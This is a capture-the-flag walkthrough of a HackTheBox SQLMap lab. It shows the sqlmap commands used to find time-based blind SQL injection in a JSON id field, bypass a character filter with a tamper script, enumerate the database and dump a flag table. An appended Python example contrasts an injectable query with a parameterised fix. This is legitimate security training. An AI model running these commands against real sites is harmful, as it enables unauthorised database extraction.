HackTheBox - SQLMap Essentials - Skills Assessment Walkthrough

Ido Abramov

Scenario

You are given access to a web application with basic protection mechanisms. Use the skills learned in this module to find the SQLi vulnerability with SQLMap and exploit it accordingly. To complete this module, find the flag and submit it here.

Walkthrough

Entering the target URL takes us to the following page, which appears to be a shoe shop website:

After some browsing, I found an 'Add to Cart' functionality on the shop.html page, which performs an HTTP POST request to /action.php:

POST /action.php HTTP/1.1
Host: 94.237.57.211:48604
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://94.237.57.211:48604/shop.html
Content-Type: application/json
Content-Length: 8
Origin: http://94.237.57.211:48604
DNT: 1
Connection: keep-alive
Sec-GPC: 1
Priority: u=0

{"id":1}

We can see that the request carries a JSON body with the parameter id set to the value 1.

Copy the full request into a file and name it req.txt.

Now, we will start SQLMap using the request data:

sqlmap -r req.txt

SQLMap generates a lot of output, but among it we can spot some interesting results:

We can see that the id parameter is vulnerable to SQL injection, specifically via the time-based blind technique. Additionally, SQLMap suggests using the between tamper script, because the server filters the > character.

With that information, the next step is to enumerate the database.

We will use several flags to find the database banner, the current user executing the queries, the current database in use, and whether the current user has database administrator privileges:

sqlmap -r req.txt --banner --current-user --current-db --is-dba --tamper=between

The output will be:

Using this information, we know the current database is production. Next, let’s enumerate the tables in this database:

sqlmap -r req.txt --tamper=between -D production --tables

Result:

We can see an interesting table called final_flag. Let’s try to retrieve its values and possibly find the flag we’re looking for. We will use the --dump flag to extract all the data from the table:

sqlmap -r req.txt --tamper=between -D production -T final_flag --dump

Since SQLMap is using a blind SQL injection technique, the process takes time: it retrieves the value one character at a time until the full string is recovered:

And finally, we found the flag!
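The root cause behind this whole walkthrough is a handler that pastes the JSON id value straight into its SQL text. The snippet below is an added example, not code from the lab or from the author: it models that injectable lookup next to a hardened version that validates the type of id and binds it as a query parameter, using an in-memory SQLite table with constructed product rows in place of the shop's real database.

```python
import json
import sqlite3


def make_db():
    """Constructed stand-in for the shop's product table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [(1, "Runner", 79.0), (2, "Trail", 99.0), (3, "Court", 59.0)],
    )
    return conn


def lookup_unsafe(conn, body):
    """Injectable form (hypothetical): the id value becomes part of the SQL text,
    so the shape of the query depends on whatever the client sends."""
    item = json.loads(body)["id"]
    sql = f"SELECT id, name FROM products WHERE id = {item}"
    return 200, conn.execute(sql).fetchall()


def lookup_safe(conn, body):
    """Hardened form: reject anything that is not a positive integer,
    then bind the value as a parameter so it can never alter the query."""
    try:
        item = json.loads(body).get("id")
    except (ValueError, AttributeError):
        # malformed JSON, or a JSON value that is not an object
        return 400, []
    # bool is a subclass of int in Python, so rule it out explicitly
    if isinstance(item, bool) or not isinstance(item, int) or item < 1:
        return 400, []
    rows = conn.execute(
        "SELECT id, name FROM products WHERE id = ?", (item,)
    ).fetchall()
    return (200, rows) if rows else (404, [])


if __name__ == "__main__":
    db = make_db()
    print(lookup_safe(db, b'{"id":1}'))          # (200, [(1, 'Runner')])
    print(lookup_safe(db, b'{"id":"1 OR 1=1"}')) # (400, [])
```

With the unsafe handler the same string-typed id would change the WHERE clause and return every row, which is exactly the class of behaviour SQLMap probes for; the safe handler answers 400 before the database is ever consulted.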
